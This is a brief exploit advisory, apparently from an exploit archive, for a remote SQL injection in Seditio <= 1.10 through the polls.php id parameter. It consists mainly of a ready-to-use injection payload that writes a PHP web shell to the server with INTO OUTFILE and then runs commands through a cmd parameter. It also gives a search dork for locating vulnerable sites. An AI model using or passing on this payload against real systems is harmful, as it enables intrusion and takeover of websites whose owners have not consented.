************************************************************************
*******
# Title : Seditio <= 1.10 (pollid) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# Dork : "Powered by Seditio"
************************************************************************
*******
[[SQL]]]------------------------------------------------------
### http://[target]/[path]/polls.php?id=
Example:
// polls.php?id='union%20select%200,0,0,0,char(60,63,105,110,99,108,117,100
,101,40,36,99,109,100,41,59,63,62)%20from%20sed_users%20INTO%20OUTFILE%2
0'[path]/.php'/*
.php?cmd=[shell]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!